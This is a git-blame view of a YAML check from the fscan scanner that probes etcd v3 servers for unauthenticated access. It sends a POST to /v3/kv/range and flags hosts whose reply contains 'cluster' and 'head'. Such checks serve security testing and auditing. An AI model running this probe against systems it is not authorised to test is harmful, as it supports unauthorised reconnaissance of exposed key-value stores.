fscan/WebScan/pocs/etcd-v3-unauth.yml

15 lines
459 B
YAML
Raw Normal View History

2025-02-17 17:37:49 +08:00
name: ETCD V3未授权
2025-01-06 17:38:18 +08:00
rules:
2025-02-17 17:37:49 +08:00
- method: POST
path: /v3/kv/range
2025-01-06 17:38:18 +08:00
follow_redirects: false
2025-02-17 17:37:49 +08:00
Content-Type: application/json;charset=utf-8
2025-01-06 17:38:18 +08:00
expression: |
2025-02-17 17:37:49 +08:00
response.status == 200 && response.body.bcontains(b"cluster") && response.body.bcontains(b"head")
body: |
{"key": "bmFtZQ=="}
2025-01-06 17:38:18 +08:00
detail:
author: rj45(https://github.com/INT2ECALL)
links:
2025-02-17 17:37:49 +08:00
- https://networksec.blog.csdn.net/article/details/144912358?spm=1001.2014.3001.5502